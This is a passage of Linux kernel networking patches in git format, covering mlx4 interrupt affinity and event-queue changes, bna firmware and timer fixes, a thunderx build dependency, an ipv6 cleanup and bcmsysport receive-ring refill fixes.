*/ @@ -391,6 +397,8 @@ struct mlx4_eq { struct mlx4_buf_list *page_list; struct mlx4_mtt mtt; struct mlx4_eq_tasklet tasklet_ctx; + struct mlx4_active_ports actv_ports; + u32 ref_count; }; struct mlx4_slave_eqe { @@ -808,6 +816,7 @@ struct mlx4_port_info { struct mlx4_vlan_table vlan_table; struct mlx4_roce_gid_table gid_table; int base_qpn; + struct cpu_rmap *rmap; }; struct mlx4_sense { @@ -818,7 +827,7 @@ struct mlx4_sense { }; struct mlx4_msix_ctl { - u64 pool_bm; + DECLARE_BITMAP(pool_bm, MAX_MSIX); struct mutex pool_lock; }; diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h b/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h index d021f079f181..edd8fd69ec9a 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h @@ -338,7 +338,7 @@ struct mlx4_en_cq { struct napi_struct napi; int size; int buf_size; - unsigned vector; + int vector; enum cq_type is_tx; u16 moder_time; u16 moder_cnt; diff --git a/include/linux/mlx4/device.h b/include/linux/mlx4/device.h index 83e80ab94500..ad31e476873f 100644 --- a/include/linux/mlx4/device.h +++ b/include/linux/mlx4/device.h @@ -46,8 +46,9 @@ #define MAX_MSIX_P_PORT 17 #define MAX_MSIX 64 -#define MSIX_LEGACY_SZ 4 #define MIN_MSIX_P_PORT 5 +#define MLX4_IS_LEGACY_EQ_MODE(dev_cap) ((dev_cap).num_comp_vectors < \ + (dev_cap).num_ports * MIN_MSIX_P_PORT) #define MLX4_MAX_100M_UNITS_VAL 255 /* * work around: can't set values @@ -528,7 +529,6 @@ struct mlx4_caps { int num_eqs; int reserved_eqs; int num_comp_vectors; - int comp_pool; int num_mpts; int max_fmr_maps; int num_mtts; @@ -1332,10 +1332,13 @@ void mlx4_fmr_unmap(struct mlx4_dev *dev, struct mlx4_fmr *fmr, int mlx4_fmr_free(struct mlx4_dev *dev, struct mlx4_fmr *fmr); int mlx4_SYNC_TPT(struct mlx4_dev *dev); int mlx4_test_interrupts(struct mlx4_dev *dev); -int mlx4_assign_eq(struct mlx4_dev *dev, char *name, struct cpu_rmap *rmap, - int *vector); +u32 mlx4_get_eqs_per_port(struct mlx4_dev *dev, u8 port); +bool mlx4_is_eq_vector_valid(struct mlx4_dev *dev, u8 port, int vector); +struct cpu_rmap *mlx4_get_cpu_rmap(struct mlx4_dev *dev, int port); +int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector); void mlx4_release_eq(struct mlx4_dev *dev, int vec); +int mlx4_is_eq_shared(struct mlx4_dev *dev, int vector); int mlx4_eq_get_irq(struct mlx4_dev *dev, int vec); int mlx4_get_phys_port_id(struct mlx4_dev *dev); From de1618034ae5704f9e503a20a1c328a0e60f6b5f Mon Sep 17 00:00:00 2001 From: Ido Shamay Date: Sun, 31 May 2015 09:30:17 +0300 Subject: [PATCH 513/872] net/mlx4_core: Move affinity hints to mlx4_core ownership Now that EQs management is in the sole responsibility of mlx4_core, the IRQ affinity hints configuration should be in its hands as well. request_irq is called only once by the first consumer (maybe mlx4_ib), so mlx4_en passes the affinity mask too late. We also need to request vectors according to the cores we want to run on. mlx4_core distribution of IRQs to cores is straight forward, EQ(i)->IRQ will set affinity hint to core i. Consumers need to request EQ vectors, according to their cores considerations (NUMA). Signed-off-by: Ido Shamay Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx4/en_cq.c | 10 +----- drivers/net/ethernet/mellanox/mlx4/eq.c | 21 +++++++++++++ drivers/net/ethernet/mellanox/mlx4/main.c | 36 ++++++++++++++++++++++ drivers/net/ethernet/mellanox/mlx4/mlx4.h | 1 + 4 files changed, 59 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/en_cq.c b/drivers/net/ethernet/mellanox/mlx4/en_cq.c index d71c567eb076..63769df872a4 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_cq.c @@ -114,7 +114,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, if (cq->is_tx == RX) { if (!mlx4_is_eq_vector_valid(mdev->dev, priv->port, cq->vector)) { - cq->vector = cq_idx; + cq->vector = cpumask_first(priv->rx_ring[cq->ring]->affinity_mask); err = mlx4_assign_eq(mdev->dev, priv->port, &cq->vector); @@ -160,13 +160,6 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, netif_napi_add(cq->dev, &cq->napi, mlx4_en_poll_tx_cq, NAPI_POLL_WEIGHT); } else { - struct mlx4_en_rx_ring *ring = priv->rx_ring[cq->ring]; - - err = irq_set_affinity_hint(cq->mcq.irq, - ring->affinity_mask); - if (err) - mlx4_warn(mdev, "Failed setting affinity hint\n"); - netif_napi_add(cq->dev, &cq->napi, mlx4_en_poll_rx_cq, 64); napi_hash_add(&cq->napi); } @@ -205,7 +198,6 @@ void mlx4_en_deactivate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq) if (!cq->is_tx) { napi_hash_del(&cq->napi); synchronize_rcu(); - irq_set_affinity_hint(cq->mcq.irq, NULL); } netif_napi_del(&cq->napi); diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 2e6fc6a860a7..11168825a9fa 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -221,6 +221,20 @@ static void mlx4_slave_event(struct mlx4_dev *dev, int slave, slave_event(dev, slave, eqe); } +static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) +{ + int hint_err; + struct mlx4_dev *dev = &priv->dev; + struct mlx4_eq *eq = &priv->eq_table.eq[vec]; + + if (!eq->affinity_mask || cpumask_empty(eq->affinity_mask)) + return; + + hint_err = irq_set_affinity_hint(eq->irq, eq->affinity_mask); + if (hint_err) + mlx4_warn(dev, "irq_set_affinity_hint failed, err %d\n", hint_err); +} + int mlx4_gen_pkey_eqe(struct mlx4_dev *dev, int slave, u8 port) { struct mlx4_eqe eqe; @@ -1092,6 +1106,10 @@ static void mlx4_free_irqs(struct mlx4_dev *dev) for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) if (eq_table->eq[i].have_irq) { + free_cpumask_var(eq_table->eq[i].affinity_mask); +#if defined(CONFIG_SMP) + irq_set_affinity_hint(eq_table->eq[i].irq, NULL); +#endif free_irq(eq_table->eq[i].irq, eq_table->eq + i); eq_table->eq[i].have_irq = 0; } @@ -1483,6 +1501,9 @@ int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector) clear_bit(*prequested_vector, priv->msix_ctl.pool_bm); *prequested_vector = -1; } else { +#if defined(CONFIG_SMP) + mlx4_set_eq_affinity_hint(priv, *prequested_vector); +#endif eq_set_ci(&priv->eq_table.eq[*prequested_vector], 1); priv->eq_table.eq[*prequested_vector].have_irq = 1; } diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 3ec5113c5a33..0dbd70427221 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2481,6 +2481,36 @@ static int mlx4_setup_hca(struct mlx4_dev *dev) return err; } +static int mlx4_init_affinity_hint(struct mlx4_dev *dev, int port, int eqn) +{ + int 
requested_cpu = 0; + struct mlx4_priv *priv = mlx4_priv(dev); + struct mlx4_eq *eq; + int off = 0; + int i; + + if (eqn > dev->caps.num_comp_vectors) + return -EINVAL; + + for (i = 1; i < port; i++) + off += mlx4_get_eqs_per_port(dev, i); + + requested_cpu = eqn - off - !!(eqn > MLX4_EQ_ASYNC); + + /* Meaning EQs are shared, and this call comes from the second port */ + if (requested_cpu < 0) + return 0; + + eq = &priv->eq_table.eq[eqn]; + + if (!zalloc_cpumask_var(&eq->affinity_mask, GFP_KERNEL)) + return -ENOMEM; + + cpumask_set_cpu(requested_cpu, eq->affinity_mask); + + return 0; +} + static void mlx4_enable_msi_x(struct mlx4_dev *dev) { struct mlx4_priv *priv = mlx4_priv(dev); @@ -2525,9 +2555,15 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) if (MLX4_IS_LEGACY_EQ_MODE(dev->caps)) { bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, dev->caps.num_ports); + /* We don't set affinity hint when there + * aren't enough EQs + */ } else { set_bit(port, priv->eq_table.eq[i].actv_ports.ports); + if (mlx4_init_affinity_hint(dev, port + 1, i)) + mlx4_warn(dev, "Couldn't init hint cpumask for EQ %d\n", + i); } /* We divide the Eqs evenly between the two ports. * (dev->caps.num_comp_vectors / dev->caps.num_ports) diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4.h b/drivers/net/ethernet/mellanox/mlx4/mlx4.h index ff40098eaf4c..f424900d23a6 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4.h @@ -399,6 +399,7 @@ struct mlx4_eq { struct mlx4_eq_tasklet tasklet_ctx; struct mlx4_active_ports actv_ports; u32 ref_count; + cpumask_var_t affinity_mask; }; struct mlx4_slave_eqe { From 6d90aa5cf17b1149115a002d7582b5d28ee43359 Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:18 +0300 Subject: [PATCH 514/872] net/mlx4_core: Make sure there are no pending async events when freeing CQ When freeing a CQ, we need to make sure there are no asynchronous events (on the ASYNC EQ) that could relate to this CQ before freeing it. This is done by introducing synchronize_irq. Signed-off-by: Matan Barak Signed-off-by: Ido Shamay Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx4/cq.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/cq.c b/drivers/net/ethernet/mellanox/mlx4/cq.c index 7431cd4d7390..3348e646db70 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/cq.c @@ -369,6 +369,9 @@ void mlx4_cq_free(struct mlx4_dev *dev, struct mlx4_cq *cq) mlx4_warn(dev, "HW2SW_CQ failed (%d) for CQN %06x\n", err, cq->cqn); synchronize_irq(priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq); + if (priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq != + priv->eq_table.eq[MLX4_EQ_ASYNC].irq) + synchronize_irq(priv->eq_table.eq[MLX4_EQ_ASYNC].irq); spin_lock_irq(&cq_table->lock); radix_tree_delete(&cq_table->tree, cq->cqn); From 5e9615bfb9586055adfa32958b5fe69eec622354 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Thu, 28 May 2015 16:00:46 +0200 Subject: [PATCH 515/872] net: thunderx: add 64-bit dependency The thunderx ethernet driver fails to build on architectures that do not have an atomic readq() and writeq() function for 64-bit PCI bus access: drivers/net/ethernet/cavium/thunder/thunder_bgx.c: In function 'bgx_reg_read': include/asm-generic/io.h:195:23: error: implicit declaration of function 'readq' [-Werror=implicit-function-declaration] It seems impossible to get this driver to work on most 32-bit hardware, so it's better to add an explicit dependency, in order to let us keep building 'allmodconfig' kernels on all architectures. As the driver is meant for the internal hardware on an arm64 SoC, this is not a problem for usability. Allowing the build on all 64-bit architectures rather than just CONFIG_ARM64 on the other hand means that we get the benefit of build testing on x86. Signed-off-by: Arnd Bergmann Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cavium/Kconfig b/drivers/net/ethernet/cavium/Kconfig index 6365fb4242be..fc3d8e3ee807 100644 --- a/drivers/net/ethernet/cavium/Kconfig +++ b/drivers/net/ethernet/cavium/Kconfig @@ -4,7 +4,7 @@ config NET_VENDOR_CAVIUM tristate "Cavium ethernet drivers" - depends on PCI + depends on PCI && 64BIT ---help--- Enable support for the Cavium ThunderX Network Interface Controller (NIC). The NIC provides the controller and DMA From e236b954232808001f522c4b79df97b8c9262a4a Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:06 +0200 Subject: [PATCH 516/872] bna: fix firmware loading on big-endian machines Firmware required by bna is stored in appropriate files as sequence of LE32 integers. After loading by request_firmware() they need to be byte-swapped on big-endian arches. Without this conversion the NIC is unusable on big-endian machines. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. 
Miller --- drivers/net/ethernet/brocade/bna/cna_fwimg.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/net/ethernet/brocade/bna/cna_fwimg.c b/drivers/net/ethernet/brocade/bna/cna_fwimg.c index ebf462d8082f..badea368bdc8 100644 --- a/drivers/net/ethernet/brocade/bna/cna_fwimg.c +++ b/drivers/net/ethernet/brocade/bna/cna_fwimg.c @@ -30,6 +30,7 @@ cna_read_firmware(struct pci_dev *pdev, u32 **bfi_image, u32 *bfi_image_size, char *fw_name) { const struct firmware *fw; + u32 n; if (request_firmware(&fw, fw_name, &pdev->dev)) { pr_alert("Can't locate firmware %s\n", fw_name); @@ -40,6 +41,12 @@ cna_read_firmware(struct pci_dev *pdev, u32 **bfi_image, *bfi_image_size = fw->size/sizeof(u32); bfi_fw = fw; + /* Convert loaded firmware to host order as it is stored in file + * as sequence of LE32 integers. + */ + for (n = 0; n < *bfi_image_size; n++) + le32_to_cpus(*bfi_image + n); + return *bfi_image; error: return NULL; From 4918eb1e7cd3b8a41ebf56b5fabaa334139b919f Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:07 +0200 Subject: [PATCH 517/872] bna: remove unreasonable iocpf timer start Driver starts iocpf timer prior bnad_ioceth_enable() call and this is unreasonable. This piece of code probably originates from Brocade/Qlogic out-of-box driver during initial import into upstream. This driver uses only one timer and queue to implement multiple timers and this timer is started at this place. The upstream driver uses multiple timers instead of this. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. Miller --- drivers/net/ethernet/brocade/bna/bnad.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/drivers/net/ethernet/brocade/bna/bnad.c b/drivers/net/ethernet/brocade/bna/bnad.c index 37072a83f9d6..caae6cb2bc1a 100644 --- a/drivers/net/ethernet/brocade/bna/bnad.c +++ b/drivers/net/ethernet/brocade/bna/bnad.c @@ -3701,10 +3701,6 @@ bnad_pci_probe(struct pci_dev *pdev, setup_timer(&bnad->bna.ioceth.ioc.sem_timer, bnad_iocpf_sem_timeout, ((unsigned long)bnad)); - /* Now start the timer before calling IOC */ - mod_timer(&bnad->bna.ioceth.ioc.iocpf_timer, - jiffies + msecs_to_jiffies(BNA_IOC_TIMER_FREQ)); - /* * Start the chip * If the call back comes with error, we bail out. From 4818e856475b309667ee38d4d0f2e3c1b933feef Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:08 +0200 Subject: [PATCH 518/872] bna: fix soft lock-up during firmware initialization failure Bug in the driver initialization causes soft-lockup if firmware initialization timeout is reached. Polling function bfa_ioc_poll_fwinit() incorrectly calls bfa_nw_iocpf_timeout() when the timeout is reached. The problem is that bfa_nw_iocpf_timeout() calls again bfa_ioc_poll_fwinit()... etc. The bfa_ioc_poll_fwinit() should directly send timeout event for iocpf and the same should be done if firmware download into HW fails. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. 
Miller --- drivers/net/ethernet/brocade/bna/bfa_ioc.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/brocade/bna/bfa_ioc.c b/drivers/net/ethernet/brocade/bna/bfa_ioc.c index 594a2ab36d31..68f3c13c9ef6 100644 --- a/drivers/net/ethernet/brocade/bna/bfa_ioc.c +++ b/drivers/net/ethernet/brocade/bna/bfa_ioc.c @@ -2414,7 +2414,7 @@ bfa_ioc_boot(struct bfa_ioc *ioc, enum bfi_fwboot_type boot_type, if (status == BFA_STATUS_OK) bfa_ioc_lpu_start(ioc); else - bfa_nw_iocpf_timeout(ioc); + bfa_fsm_send_event(&ioc->iocpf, IOCPF_E_TIMEOUT); return status; } @@ -3029,7 +3029,7 @@ bfa_ioc_poll_fwinit(struct bfa_ioc *ioc) } if (ioc->iocpf.poll_time >= BFA_IOC_TOV) { - bfa_nw_iocpf_timeout(ioc); + bfa_fsm_send_event(&ioc->iocpf, IOCPF_E_TIMEOUT); } else { ioc->iocpf.poll_time += BFA_IOC_POLL_TOV; mod_timer(&ioc->iocpf_timer, jiffies + From 3d2f6d41d1588c975d16c5969726d018bba90794 Mon Sep 17 00:00:00 2001 From: Julia Lawall Date: Thu, 28 May 2015 23:02:17 +0200 Subject: [PATCH 519/872] ipv6: drop unneeded goto Delete jump to a label on the next line, when that label is not used elsewhere. A simplified version of the semantic patch that makes this change is as follows: (http://coccinelle.lip6.fr/) // @r@ identifier l; @@ -if (...) goto l; -l: // Also remove the unnecessary ret variable. Signed-off-by: Julia Lawall Signed-off-by: David S. Miller --- net/ipv6/raw.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c index 484a5c144073..ca4700cb26c4 100644 --- a/net/ipv6/raw.c +++ b/net/ipv6/raw.c @@ -1327,13 +1327,7 @@ static struct inet_protosw rawv6_protosw = { int __init rawv6_init(void) { - int ret; - - ret = inet6_register_protosw(&rawv6_protosw); - if (ret) - goto out; -out: - return ret; + return inet6_register_protosw(&rawv6_protosw); } void rawv6_exit(void) From baf387a8edaa4a55afeaf4f498d3891ddcb03fb7 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:42 -0700 Subject: [PATCH 520/872] net: systemport: Pre-calculate and utilize cb->bd_addr There is a 1:1 mapping between the software maintained control block in priv->rx_cbs and the buffer address in priv->rx_bds, such that there is no need to keep computing the buffer address when refiling a control block. Signed-off-by: Florian Fainelli Signed-off-by: David S. 
Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 18 +++++++++--------- drivers/net/ethernet/broadcom/bcmsysport.h | 2 -- 2 files changed, 9 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index 084a50a555de..267330ccd595 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -549,12 +549,7 @@ static int bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, } dma_unmap_addr_set(cb, dma_addr, mapping); - dma_desc_set_addr(priv, priv->rx_bd_assign_ptr, mapping); - - priv->rx_bd_assign_index++; - priv->rx_bd_assign_index &= (priv->num_rx_bds - 1); - priv->rx_bd_assign_ptr = priv->rx_bds + - (priv->rx_bd_assign_index * DESC_SIZE); + dma_desc_set_addr(priv, cb->bd_addr, mapping); netif_dbg(priv, rx_status, ndev, "RX refill\n"); @@ -568,7 +563,7 @@ static int bcm_sysport_alloc_rx_bufs(struct bcm_sysport_priv *priv) unsigned int i; for (i = 0; i < priv->num_rx_bds; i++) { - cb = &priv->rx_cbs[priv->rx_bd_assign_index]; + cb = &priv->rx_cbs[i]; if (cb->skb) continue; @@ -1330,14 +1325,14 @@ static inline int tdma_enable_set(struct bcm_sysport_priv *priv, static int bcm_sysport_init_rx_ring(struct bcm_sysport_priv *priv) { + struct bcm_sysport_cb *cb; u32 reg; int ret; + int i; /* Initialize SW view of the RX ring */ priv->num_rx_bds = NUM_RX_DESC; priv->rx_bds = priv->base + SYS_PORT_RDMA_OFFSET; - priv->rx_bd_assign_ptr = priv->rx_bds; - priv->rx_bd_assign_index = 0; priv->rx_c_index = 0; priv->rx_read_ptr = 0; priv->rx_cbs = kcalloc(priv->num_rx_bds, sizeof(struct bcm_sysport_cb), @@ -1347,6 +1342,11 @@ static int bcm_sysport_init_rx_ring(struct bcm_sysport_priv *priv) return -ENOMEM; } + for (i = 0; i < priv->num_rx_bds; i++) { + cb = priv->rx_cbs + i; + cb->bd_addr = priv->rx_bds + i * DESC_SIZE; + } + ret = bcm_sysport_alloc_rx_bufs(priv); if (ret) { netif_err(priv, hw, priv->netdev, "SKB allocation failed\n"); diff --git a/drivers/net/ethernet/broadcom/bcmsysport.h b/drivers/net/ethernet/broadcom/bcmsysport.h index 42a4b4a0bc14..f28bf545d7f4 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.h +++ b/drivers/net/ethernet/broadcom/bcmsysport.h @@ -663,8 +663,6 @@ struct bcm_sysport_priv { /* Receive queue */ void __iomem *rx_bds; - void __iomem *rx_bd_assign_ptr; - unsigned int rx_bd_assign_index; struct bcm_sysport_cb *rx_cbs; unsigned int num_rx_bds; unsigned int rx_read_ptr; From c73b01837eeeba91b9c22c67c6372a6b73f08473 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:43 -0700 Subject: [PATCH 521/872] net: systemport: rewrite bcm_sysport_rx_refill Currently, bcm_sysport_desc_rx() calls bcm_sysport_rx_refill() at the end of Rx packet processing loop, after the current Rx packet has already been passed to napi_gro_receive(). However, bcm_sysport_rx_refill() might fail to allocate a new Rx skb, thus leaving a hole on the Rx queue where no valid Rx buffer exists. To eliminate this situation: 1. Rewrite bcm_sysport_rx_refill() to retain the current Rx skb on the Rx queue if a new replacement Rx skb can't be allocated and DMA-mapped. In this case, the data on the current Rx skb is effectively dropped. 2. Modify bcm_sysport_desc_rx() to call bcm_sysport_rx_refill() at the top of Rx packet processing loop, so that the new replacement Rx skb is already in place before the current Rx skb is processed. 
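What makes this rewrite safe is the ordering: allocate and DMA-map the replacement buffer first, and only then take the buffer that is currently posted on the ring; if the allocation fails, the old buffer stays posted and the incoming packet is simply dropped. A minimal sketch of that pattern, using made-up names (ring_slot, alloc_buf) rather than the driver's real structures:

#include <stddef.h>

/* Hypothetical slot type standing in for the driver's control block. */
struct ring_slot {
        void *buf;                      /* buffer currently posted to the HW */
};

/*
 * Returns the previously posted (filled) buffer, or NULL when no
 * replacement could be allocated, in which case the old buffer stays
 * posted and the incoming packet is effectively dropped.
 */
static void *slot_refill(struct ring_slot *slot, void *(*alloc_buf)(void))
{
        void *nbuf = alloc_buf();       /* allocate the replacement first */
        void *obuf;

        if (!nbuf)
                return NULL;            /* keep the old buffer on the ring */

        obuf = slot->buf;               /* take the filled buffer ...      */
        slot->buf = nbuf;               /* ... and post the fresh one      */

        return obuf;                    /* caller processes or frees this  */
}
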
This is loosely inspired from d6707bec5986 ("net: bcmgenet: rewrite bcmgenet_rx_refill()") Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 81 +++++++++++----------- 1 file changed, 41 insertions(+), 40 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index 267330ccd595..d777b0db9e63 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -524,62 +524,70 @@ static void bcm_sysport_free_cb(struct bcm_sysport_cb *cb) dma_unmap_addr_set(cb, dma_addr, 0); } -static int bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, - struct bcm_sysport_cb *cb) +static struct sk_buff *bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, + struct bcm_sysport_cb *cb) { struct device *kdev = &priv->pdev->dev; struct net_device *ndev = priv->netdev; + struct sk_buff *skb, *rx_skb; dma_addr_t mapping; - int ret; - cb->skb = netdev_alloc_skb(priv->netdev, RX_BUF_LENGTH); - if (!cb->skb) { + /* Allocate a new SKB for a new packet */ + skb = netdev_alloc_skb(priv->netdev, RX_BUF_LENGTH); + if (!skb) { + priv->mib.alloc_rx_buff_failed++; netif_err(priv, rx_err, ndev, "SKB alloc failed\n"); - return -ENOMEM; + return NULL; } - mapping = dma_map_single(kdev, cb->skb->data, + mapping = dma_map_single(kdev, skb->data, RX_BUF_LENGTH, DMA_FROM_DEVICE); - ret = dma_mapping_error(kdev, mapping); - if (ret) { + if (dma_mapping_error(kdev, mapping)) { priv->mib.rx_dma_failed++; - bcm_sysport_free_cb(cb); + dev_kfree_skb_any(skb); netif_err(priv, rx_err, ndev, "DMA mapping failure\n"); - return ret; + return NULL; } + /* Grab the current SKB on the ring */ + rx_skb = cb->skb; + if (likely(rx_skb)) + dma_unmap_single(kdev, dma_unmap_addr(cb, dma_addr), + RX_BUF_LENGTH, DMA_FROM_DEVICE); + + /* Put the new SKB on the ring */ + cb->skb = skb; dma_unmap_addr_set(cb, dma_addr, mapping); dma_desc_set_addr(priv, cb->bd_addr, mapping); netif_dbg(priv, rx_status, ndev, "RX refill\n"); - return 0; + /* Return the current SKB to the caller */ + return rx_skb; } static int bcm_sysport_alloc_rx_bufs(struct bcm_sysport_priv *priv) { struct bcm_sysport_cb *cb; - int ret = 0; + struct sk_buff *skb; unsigned int i; for (i = 0; i < priv->num_rx_bds; i++) { cb = &priv->rx_cbs[i]; - if (cb->skb) - continue; - - ret = bcm_sysport_rx_refill(priv, cb); - if (ret) - break; + skb = bcm_sysport_rx_refill(priv, cb); + if (skb) + dev_kfree_skb(skb); + if (!cb->skb) + return -ENOMEM; } - return ret; + return 0; } /* Poll the hardware for up to budget packets to process */ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, unsigned int budget) { - struct device *kdev = &priv->pdev->dev; struct net_device *ndev = priv->netdev; unsigned int processed = 0, to_process; struct bcm_sysport_cb *cb; @@ -587,7 +595,6 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, unsigned int p_index; u16 len, status; struct bcm_rsb *rsb; - int ret; /* Determine how much we should process since last call */ p_index = rdma_readl(priv, RDMA_PROD_INDEX); @@ -605,13 +612,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, while ((processed < to_process) && (processed < budget)) { cb = &priv->rx_cbs[priv->rx_read_ptr]; - skb = cb->skb; - - processed++; - priv->rx_read_ptr++; + skb = bcm_sysport_rx_refill(priv, cb); - if (priv->rx_read_ptr == priv->num_rx_bds) - priv->rx_read_ptr = 0; /* We do not have a backing SKB, so we do not a 
corresponding * DMA mapping for this incoming packet since @@ -622,12 +624,9 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, netif_err(priv, rx_err, ndev, "out of memory!\n"); ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - goto refill; + goto next; } - dma_unmap_single(kdev, dma_unmap_addr(cb, dma_addr), - RX_BUF_LENGTH, DMA_FROM_DEVICE); - /* Extract the Receive Status Block prepended */ rsb = (struct bcm_rsb *)skb->data; len = (rsb->rx_status_len >> DESC_LEN_SHIFT) & DESC_LEN_MASK; @@ -643,8 +642,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, netif_err(priv, rx_status, ndev, "fragmented packet!\n"); ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - bcm_sysport_free_cb(cb); - goto refill; + dev_kfree_skb_any(skb); + goto next; } if (unlikely(status & (RX_STATUS_ERR | RX_STATUS_OVFLOW))) { @@ -653,8 +652,8 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, ndev->stats.rx_over_errors++; ndev->stats.rx_dropped++; ndev->stats.rx_errors++; - bcm_sysport_free_cb(cb); - goto refill; + dev_kfree_skb_any(skb); + goto next; } skb_put(skb, len); @@ -681,10 +680,12 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, ndev->stats.rx_bytes += len; napi_gro_receive(&priv->napi, skb); -refill: - ret = bcm_sysport_rx_refill(priv, cb); - if (ret) - priv->mib.alloc_rx_buff_failed++; +next: + processed++; + priv->rx_read_ptr++; + + if (priv->rx_read_ptr == priv->num_rx_bds) + priv->rx_read_ptr = 0; } return processed; From 25977ac77d62b3de19908979ac84c8fd5809de6f Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:44 -0700 Subject: [PATCH 522/872] net: systemport: Add a check for oversized packets Occasionnaly we may get oversized packets from the hardware which exceed the nomimal 2KiB buffer size we allocate SKBs with. Add an early check which drops the packet to avoid invoking skb_over_panic() and move on to processing the next packet. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index d777b0db9e63..909ad7a0d480 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -638,6 +638,14 @@ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, p_index, priv->rx_c_index, priv->rx_read_ptr, len, status); + if (unlikely(len > RX_BUF_LENGTH)) { + netif_err(priv, rx_status, ndev, "oversized packet\n"); + ndev->stats.rx_length_errors++; + ndev->stats.rx_errors++; + dev_kfree_skb_any(skb); + goto next; + } + if (unlikely(!(status & DESC_EOP) || !(status & DESC_SOP))) { netif_err(priv, rx_status, ndev, "fragmented packet!\n"); ndev->stats.rx_dropped++; From 282c320d33541d61f4ab91248448040c4ebab1fc Mon Sep 17 00:00:00 2001 From: Wang Long Date: Fri, 29 May 2015 01:02:08 +0000 